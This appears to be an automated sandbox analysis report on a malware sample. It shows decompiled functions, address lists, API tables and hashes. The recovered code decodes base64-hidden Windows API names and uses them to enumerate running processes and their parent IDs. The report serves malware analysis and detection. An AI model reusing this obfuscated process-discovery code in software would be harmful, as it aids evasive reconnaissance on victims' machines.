								_t90 = _t240 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t240 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t194 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t194,  &_v612, 1, _t235, _t240, _t245);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t194 = _t194 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t214);
				 *[fs:eax] = _t214;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t216 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t216);
			}









































                                                                                                                                                                                          0x00416b94
                                                                                                                                                                                          0x00416b95
                                                                                                                                                                                          0x00416b97
                                                                                                                                                                                          0x00416ba2
                                                                                                                                                                                          0x00416ba8
                                                                                                                                                                                          0x00416bae
                                                                                                                                                                                          0x00416bb4
                                                                                                                                                                                          0x00416bba
                                                                                                                                                                                          0x00416bc0
                                                                                                                                                                                          0x00416bc6
                                                                                                                                                                                          0x00416bcc
                                                                                                                                                                                          0x00416bcf
                                                                                                                                                                                          0x00416bd2
                                                                                                                                                                                          0x00416be0
                                                                                                                                                                                          0x00416bee
                                                                                                                                                                                          0x00416bf9
                                                                                                                                                                                          0x00416c0f
                                                                                                                                                                                          0x00416c1c
                                                                                                                                                                                          0x00416c27
                                                                                                                                                                                          0x00416c3d
                                                                                                                                                                                          0x00416c4a
                                                                                                                                                                                          0x00416c55
                                                                                                                                                                                          0x00416c66
                                                                                                                                                                                          0x00416c82
                                                                                                                                                                                          0x00416c87
                                                                                                                                                                                          0x00416c92
                                                                                                                                                                                          0x00416c97
                                                                                                                                                                                          0x00416c9d
                                                                                                                                                                                          0x00416cad
                                                                                                                                                                                          0x00416cae
                                                                                                                                                                                          0x00416cb3
                                                                                                                                                                                          0x00416cb5
                                                                                                                                                                                          0x00416cbe
                                                                                                                                                                                          0x00416ccd
                                                                                                                                                                                          0x00416cd8
                                                                                                                                                                                          0x00416cee
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cfb
                                                                                                                                                                                          0x00416d0f
                                                                                                                                                                                          0x00416d1c
                                                                                                                                                                                          0x00416d1d
                                                                                                                                                                                          0x00416d20
                                                                                                                                                                                          0x00416cb5
                                                                                                                                                                                          0x00416d25
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d36
                                                                                                                                                                                          0x00416d39
                                                                                                                                                                                          0x00416d3c
                                                                                                                                                                                          0x00416d3f
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d4d
                                                                                                                                                                                          0x00416d50
                                                                                                                                                                                          0x00416d52
                                                                                                                                                                                          0x00416d53
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d5e
                                                                                                                                                                                          0x00416d62
                                                                                                                                                                                          0x00416d68
                                                                                                                                                                                          0x00416d6b
                                                                                                                                                                                          0x00416d6f
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d75
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d79
                                                                                                                                                                                          0x00416d82
                                                                                                                                                                                          0x00416d89
                                                                                                                                                                                          0x00416d8d
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d97
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416da4
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416daf
                                                                                                                                                                                          0x00416dba
                                                                                                                                                                                          0x00416dbd
                                                                                                                                                                                          0x00416dc4
                                                                                                                                                                                          0x00416dc7
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dd7
                                                                                                                                                                                          0x00416de0
                                                                                                                                                                                          0x00416de7
                                                                                                                                                                                          0x00416e22
                                                                                                                                                                                          0x00416e2e
                                                                                                                                                                                          0x00416e37
                                                                                                                                                                                          0x00416e3c
                                                                                                                                                                                          0x00416e42
                                                                                                                                                                                          0x00416e4f
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416df5
                                                                                                                                                                                          0x00416dfe
                                                                                                                                                                                          0x00416e03
                                                                                                                                                                                          0x00416e09
                                                                                                                                                                                          0x00416e0e
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e5e
                                                                                                                                                                                          0x00416e6d
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e87
                                                                                                                                                                                          0x00416e8c
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416e98
                                                                                                                                                                                          0x00416e9b
                                                                                                                                                                                          0x00416e9e
                                                                                                                                                                                          0x00416eae
                                                                                                                                                                                          0x00416eb6
                                                                                                                                                                                          0x00416ebe
                                                                                                                                                                                          0x00416ec9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                          • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                          • API String ID: 3877065590-4127804628
                                                                                                                                                                                          • Opcode ID: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                                                                                                                                                                                          • Instruction ID: b4fa090e97bfe7a1d5ce5cc441e323bfe92997b970e5e29befa82c83258fdf6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3f8819d2a06753c8c004d88ffab413edcc893332a2b89064e09e30df0b38323
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4918574A001099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416B8C, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 216libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00416B8C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				signed int _t110;
				CHAR* _t115;
				CHAR* _t121;
				CHAR* _t127;
				void* _t139;
				void* _t143;
				void* _t171;
				signed int _t172;
				void* _t173;
				intOrPtr* _t176;
				signed int _t185;
				intOrPtr* _t194;
				void* _t195;
				signed int _t196;
				signed int _t197;
				intOrPtr _t216;
				intOrPtr _t218;
				signed int _t231;
				intOrPtr* _t241;
				signed int _t242;
				signed int _t244;
				void* _t245;
				void* _t246;
				void* _t248;
				intOrPtr _t249;

				_t240 = __esi;
				_t109 = __eax +  *__eax;
				 *_t109 =  *_t109 + _t109;
				_t110 = _t109 | 0x5500000a;
				_t247 = _t248;
				_t249 = _t248 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t110;
				 *[fs:eax] = _t249;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t115 = E00403990(_v588);
				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
				_t121 = E00403990(_v592);
				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
				_t127 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
				E004034E4(_v16);
				_t195 =  *_t194(2, 0,  *[fs:eax], 0x416eca, _t248, __edi, __esi, __ebx, _t246);
				if(_t195 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t195);
					if( *_t237() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t185 = E004045EC(_v8);
							_t245 =  &_v584;
							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
							_t249 = _t249 + 0x10;
							_t237 = _t245 + 0x116;
							_t241 = _t241;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t195);
						} while ( *_t241() != 0);
					}
					_t176 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t176))(_t195);
				}
				_t139 = E004045EC(_v8) - 1;
				if(_t139 >= 0) {
					_v28 = _t139 + 1;
					_t197 = 0;
					do {
						_v17 = 1;
						_t171 = E004045EC(_v8) - 1;
						if(_t171 >= 0) {
							_t173 = _t171 + 1;
							_t231 = 0;
							do {
								_t43 = _t197 * 0x8b * 4; // 0x0
								_t244 = _t231 * 0x8b;
								_t237 = _v8;
								_t47 = _t244 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t231 = _t231 + 1;
								_t173 = _t173 - 1;
							} while (_t173 != 0);
						}
						_t172 = _t197 * 0x8b;
						_t52 = _t172 * 4; // 0x0
						_t56 = _t172 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
						}
						_t197 = _t197 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t143 = E004045EC(_v8) - 1;
				if(_t143 >= 0) {
					_v28 = _t143 + 1;
					_t196 = 0;
					do {
						_t242 = _t196 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
							_t75 = _t242 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t242 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t242 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t196 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t196 = _t196 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t216);
				 *[fs:eax] = _t216;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t218 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t218);
			}











































                                                                                                                                                                                          0x00416b8c
                                                                                                                                                                                          0x00416b8c
                                                                                                                                                                                          0x00416b8e
                                                                                                                                                                                          0x00416b90
                                                                                                                                                                                          0x00416b95
                                                                                                                                                                                          0x00416b97
                                                                                                                                                                                          0x00416ba2
                                                                                                                                                                                          0x00416ba8
                                                                                                                                                                                          0x00416bae
                                                                                                                                                                                          0x00416bb4
                                                                                                                                                                                          0x00416bba
                                                                                                                                                                                          0x00416bc0
                                                                                                                                                                                          0x00416bc6
                                                                                                                                                                                          0x00416bcc
                                                                                                                                                                                          0x00416bcf
                                                                                                                                                                                          0x00416bd2
                                                                                                                                                                                          0x00416be0
                                                                                                                                                                                          0x00416bee
                                                                                                                                                                                          0x00416bf9
                                                                                                                                                                                          0x00416c0f
                                                                                                                                                                                          0x00416c1c
                                                                                                                                                                                          0x00416c27
                                                                                                                                                                                          0x00416c3d
                                                                                                                                                                                          0x00416c4a
                                                                                                                                                                                          0x00416c55
                                                                                                                                                                                          0x00416c66
                                                                                                                                                                                          0x00416c82
                                                                                                                                                                                          0x00416c87
                                                                                                                                                                                          0x00416c92
                                                                                                                                                                                          0x00416c97
                                                                                                                                                                                          0x00416c9d
                                                                                                                                                                                          0x00416cad
                                                                                                                                                                                          0x00416cae
                                                                                                                                                                                          0x00416cb3
                                                                                                                                                                                          0x00416cb5
                                                                                                                                                                                          0x00416cbe
                                                                                                                                                                                          0x00416ccd
                                                                                                                                                                                          0x00416cd8
                                                                                                                                                                                          0x00416cee
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cfb
                                                                                                                                                                                          0x00416d0f
                                                                                                                                                                                          0x00416d1c
                                                                                                                                                                                          0x00416d1d
                                                                                                                                                                                          0x00416d20
                                                                                                                                                                                          0x00416cb5
                                                                                                                                                                                          0x00416d25
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d36
                                                                                                                                                                                          0x00416d39
                                                                                                                                                                                          0x00416d3c
                                                                                                                                                                                          0x00416d3f
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d4d
                                                                                                                                                                                          0x00416d50
                                                                                                                                                                                          0x00416d52
                                                                                                                                                                                          0x00416d53
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d5e
                                                                                                                                                                                          0x00416d62
                                                                                                                                                                                          0x00416d68
                                                                                                                                                                                          0x00416d6b
                                                                                                                                                                                          0x00416d6f
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d75
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d79
                                                                                                                                                                                          0x00416d82
                                                                                                                                                                                          0x00416d89
                                                                                                                                                                                          0x00416d8d
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d97
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416da4
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416daf
                                                                                                                                                                                          0x00416dba
                                                                                                                                                                                          0x00416dbd
                                                                                                                                                                                          0x00416dc4
                                                                                                                                                                                          0x00416dc7
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416dd7
                                                                                                                                                                                          0x00416de0
                                                                                                                                                                                          0x00416de7
                                                                                                                                                                                          0x00416e22
                                                                                                                                                                                          0x00416e2e
                                                                                                                                                                                          0x00416e37
                                                                                                                                                                                          0x00416e3c
                                                                                                                                                                                          0x00416e42
                                                                                                                                                                                          0x00416e4f
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416de9
                                                                                                                                                                                          0x00416df5
                                                                                                                                                                                          0x00416dfe
                                                                                                                                                                                          0x00416e03
                                                                                                                                                                                          0x00416e09
                                                                                                                                                                                          0x00416e0e
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e1b
                                                                                                                                                                                          0x00416e5e
                                                                                                                                                                                          0x00416e6d
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e7c
                                                                                                                                                                                          0x00416e87
                                                                                                                                                                                          0x00416e8c
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416e8d
                                                                                                                                                                                          0x00416dc9
                                                                                                                                                                                          0x00416e98
                                                                                                                                                                                          0x00416e9b
                                                                                                                                                                                          0x00416e9e
                                                                                                                                                                                          0x00416eae
                                                                                                                                                                                          0x00416eb6
                                                                                                                                                                                          0x00416ebe
                                                                                                                                                                                          0x00416ec9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                          • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                          • API String ID: 3877065590-4127804628
                                                                                                                                                                                          • Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                          • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416B90, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 214libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00416B90(signed int __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				long _v12;
				signed int _v16;
				char _v17;
				char _v24;
				char _v28;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				signed int _t109;
				CHAR* _t114;
				CHAR* _t120;
				CHAR* _t126;
				void* _t138;
				void* _t142;
				void* _t170;
				signed int _t171;
				void* _t172;
				intOrPtr* _t175;
				signed int _t184;
				intOrPtr* _t193;
				void* _t194;
				signed int _t195;
				signed int _t196;
				intOrPtr _t215;
				intOrPtr _t217;
				signed int _t230;
				intOrPtr* _t240;
				signed int _t241;
				signed int _t243;
				void* _t244;
				void* _t245;
				void* _t247;
				intOrPtr _t248;

				_t239 = __esi;
				_t109 = __eax | 0x5500000a;
				_t246 = _t247;
				_t248 = _t247 + 0xfffffda0;
				_v612 = 0;
				_v608 = 0;
				_v604 = 0;
				_v596 = 0;
				_v600 = 0;
				_v592 = 0;
				_v588 = 0;
				_v8 = 0;
				_v24 = 0;
				_v16 = _t109;
				 *[fs:eax] = _t248;
				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
				_t114 = E00403990(_v588);
				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
				E00406984("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
				_t120 = E00403990(_v592);
				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
				E00406984("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
				_t126 = E00403990(_v596);
				E00406984("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
				E004034E4(_v16);
				_t194 =  *_t193(2, 0,  *[fs:eax], 0x416eca, _t247, __edi, __esi, __ebx, _t245);
				if(_t194 != 0xffffffff) {
					_v584 = 0x22c;
					_push( &_v584);
					_push(_t194);
					if( *_t236() != 0) {
						do {
							_push(E004045EC(_v8) + 1);
							E004047A8();
							_t184 = E004045EC(_v8);
							_t244 =  &_v584;
							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
							_t248 = _t248 + 0x10;
							_t236 = _t244 + 0x116;
							_t240 = _t240;
							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
							_push( &_v584);
							_push(_t194);
						} while ( *_t240() != 0);
					}
					_t175 =  *0x41b57c; // 0x41c690
					 *((intOrPtr*)( *_t175))(_t194);
				}
				_t138 = E004045EC(_v8) - 1;
				if(_t138 >= 0) {
					_v28 = _t138 + 1;
					_t196 = 0;
					do {
						_v17 = 1;
						_t170 = E004045EC(_v8) - 1;
						if(_t170 >= 0) {
							_t172 = _t170 + 1;
							_t230 = 0;
							do {
								_t43 = _t196 * 0x8b * 4; // 0x0
								_t243 = _t230 * 0x8b;
								_t236 = _v8;
								_t47 = _t243 * 4; // 0x1ffff
								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
									_v17 = 0;
								}
								_t230 = _t230 + 1;
								_t172 = _t172 - 1;
							} while (_t172 != 0);
						}
						_t171 = _t196 * 0x8b;
						_t52 = _t171 * 4; // 0x0
						_t56 = _t171 * 4; // 0x1ffff
						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
							_v17 = 1;
						}
						if(_v17 == 1) {
							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
						}
						_t196 = _t196 + 1;
						_t64 =  &_v28;
						 *_t64 = _v28 - 1;
					} while ( *_t64 != 0);
				}
				_v12 = GetCurrentProcessId();
				_t142 = E004045EC(_v8) - 1;
				if(_t142 >= 0) {
					_v28 = _t142 + 1;
					_t195 = 0;
					do {
						_t241 = _t195 * 0x8b;
						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
							_t75 = _t241 * 4; // 0x1ffff
							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
								_push(_v24);
								_t90 = _t241 * 4; // 0x0
								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
								_push(_v608);
								_push(E00416F84);
								E00403850();
							} else {
								_push(_v24);
								_t82 = _t241 * 4; // 0x0
								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
								_push(_v604);
								_push(0x416f78);
								_push(E00416F84);
								E00403850();
							}
							_t96 = _t195 * 0x8b * 4; // 0x1ffff
							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
							E00403798( &_v24, _v612);
						}
						E00403538(_v16, _v24);
						_t195 = _t195 + 1;
						_t103 =  &_v28;
						 *_t103 = _v28 - 1;
					} while ( *_t103 != 0);
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E00416ED1);
				E00403508( &_v612, 7);
				E004034E4( &_v24);
				_t217 =  *0x4169c8; // 0x4169cc
				return E004047B4( &_v8, _t217);
			}










































                                                                                                                                                                                          0x00416b90
                                                                                                                                                                                          0x00416b90
                                                                                                                                                                                          0x00416b95
                                                                                                                                                                                          0x00416b97
                                                                                                                                                                                          0x00416ba2
                                                                                                                                                                                          0x00416ba8
                                                                                                                                                                                          0x00416bae
                                                                                                                                                                                          0x00416bb4
                                                                                                                                                                                          0x00416bba
                                                                                                                                                                                          0x00416bc0
                                                                                                                                                                                          0x00416bc6
                                                                                                                                                                                          0x00416bcc
                                                                                                                                                                                          0x00416bcf
                                                                                                                                                                                          0x00416bd2
                                                                                                                                                                                          0x00416be0
                                                                                                                                                                                          0x00416bee
                                                                                                                                                                                          0x00416bf9
                                                                                                                                                                                          0x00416c0f
                                                                                                                                                                                          0x00416c1c
                                                                                                                                                                                          0x00416c27
                                                                                                                                                                                          0x00416c3d
                                                                                                                                                                                          0x00416c4a
                                                                                                                                                                                          0x00416c55
                                                                                                                                                                                          0x00416c66
                                                                                                                                                                                          0x00416c82
                                                                                                                                                                                          0x00416c87
                                                                                                                                                                                          0x00416c92
                                                                                                                                                                                          0x00416c97
                                                                                                                                                                                          0x00416c9d
                                                                                                                                                                                          0x00416cad
                                                                                                                                                                                          0x00416cae
                                                                                                                                                                                          0x00416cb3
                                                                                                                                                                                          0x00416cb5
                                                                                                                                                                                          0x00416cbe
                                                                                                                                                                                          0x00416ccd
                                                                                                                                                                                          0x00416cd8
                                                                                                                                                                                          0x00416cee
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cf9
                                                                                                                                                                                          0x00416cfb
                                                                                                                                                                                          0x00416d0f
                                                                                                                                                                                          0x00416d1c
                                                                                                                                                                                          0x00416d1d
                                                                                                                                                                                          0x00416d20
                                                                                                                                                                                          0x00416cb5
                                                                                                                                                                                          0x00416d25
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d2c
                                                                                                                                                                                          0x00416d36
                                                                                                                                                                                          0x00416d39
                                                                                                                                                                                          0x00416d3c
                                                                                                                                                                                          0x00416d3f
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d41
                                                                                                                                                                                          0x00416d4d
                                                                                                                                                                                          0x00416d50
                                                                                                                                                                                          0x00416d52
                                                                                                                                                                                          0x00416d53
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d5e
                                                                                                                                                                                          0x00416d62
                                                                                                                                                                                          0x00416d68
                                                                                                                                                                                          0x00416d6b
                                                                                                                                                                                          0x00416d6f
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d71
                                                                                                                                                                                          0x00416d75
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d76
                                                                                                                                                                                          0x00416d55
                                                                                                                                                                                          0x00416d79
                                                                                                                                                                                          0x00416d82
                                                                                                                                                                                          0x00416d89
                                                                                                                                                                                          0x00416d8d
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d8f
                                                                                                                                                                                          0x00416d97
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416d9c
                                                                                                                                                                                          0x00416da4
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
                                                                                                                                                                                          0x00416da5
